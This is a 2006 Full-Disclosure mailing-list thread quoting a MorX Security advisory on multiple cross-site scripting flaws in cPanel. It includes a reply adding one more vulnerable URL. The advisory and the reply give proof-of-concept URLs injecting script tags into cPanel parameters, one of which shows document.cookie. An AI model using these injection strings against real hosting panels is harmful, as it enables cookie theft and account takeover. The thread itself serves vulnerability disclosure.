[Full-disclosure] Re: cPanel Multiple Cross Site Scripting Vulnerability



One more to ur list
http://localhost:2095/dowebmailforward.cgi?fwd=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&action=Add+Forwarder

Sumit

On 2/4/06, Hamish Stanaway <koremeltdown@xxxxxxxxxxx> wrote:

Hi there,

Thank you for finding this vulnerability in a widely used software. I was
wondering if you had a solution or a work around to this issue?



Kindest of regards,

Hamish Stanaway, CEO

Absolute Web Hosting / -= KoRe WoRkS =- Internet Security
Auckland, New Zealand

http://www.webhosting.net.nz
http://www.buywebhosting.co.nz
http://www.koreworks.com





From: simo@xxxxxxxx
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: cPanel Multiple Cross Site Scripting Vulnerability
Date: Fri, 3 Feb 2006 04:31:49 -0000 (GMT)
MIME-Version: 1.0
Received: from outgoing.securityfocus.com ([205.206.231.27]) by
bay0-mc9-f14.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Fri,
3
Feb 2006 08:56:14 -0800
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx1.hotmail.com [65.54.245.8]) with ESMTP; Fri, 3
Feb
2006 08:33:09 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com
[205.206.231.20])by outgoing3.securityfocus.com (Postfix) with QMQPid
803C22370A5; Fri, 3 Feb 2006 08:16:33 -0700 (MST)
Received: (qmail 6780 invoked from network); 2 Feb 2006 22:40:44 -0000
X-Message-Info: JGTYoYF78jGKb+TzrGE6v17OoDzGi89mDti/qOuHBeA=
Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
User-Agent: SquirrelMail/1.4.4
X-AntiAbuse: This header was added to track abuse, please include it with
any abuse report
X-AntiAbuse: Primary Hostname - serveur7.heberjahiz.com
X-AntiAbuse: Original Domain - securityfocus.com
X-AntiAbuse: Originator/Caller UID/GID - [32233 502] / [47 12]
X-AntiAbuse: Sender Address Domain - morx.org
X-Source: X-Source-Args: X-Source-Dir: Return-Path:
bugtraq-return-23195-koremeltdown=hotmail.com@xxxxxxxxxxxxxxxxx
X-OriginalArrivalTime: 03 Feb 2006 16:56:14.0902 (UTC)
FILETIME=[BE6AAD60:01C628E2]

Title: cPanel Multiple Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: 22 january 2005
Published: 02 february 2006
MorX Security Research Team
http://www.morx.org

Service: Web Hosting Manager

Vendor: cPanel

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severity: Medium/High

Details:

cPanel (control panel) is a graphical web-based management tool, designed
to make administration of web sites as easy as possible. cPanel handles
all aspects of website administration in an easy-to-use interface.
The software, which is proprietary, runs on a number of popular RPM-based
Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat
Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly
accessed on ports 2082 and 2083 (for a SSL version). Authentication is
either via HTTP or web page login. cPanel is prone to cross-site
scripting
attacks. This problem is due to a failure in the application to properly
sanitize user-supplied input



Impact:

an attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authentified cPanel user in the
context
of the website hosting the vulnerable cPanel version. resulting in the
theft of cookie-based authentication giving the attacker full access to
the victim's cPanel account as well as other type of attacks.


Affected scripts with proof of concept exploit:


http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=
<script>alert('vul')</script>&domain=


http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=
<script>alert('vul')</script>&domain=xxx


http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0
"><script>alert('vul')</script>


http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=
"><script>alert('vul')</script>


http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx
"><script>alert('vul')</script>&target=xxx


http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006
"><script>alert('vul')</script>&domain=xxx&target=xxx


http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan
"><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx


Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.





--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages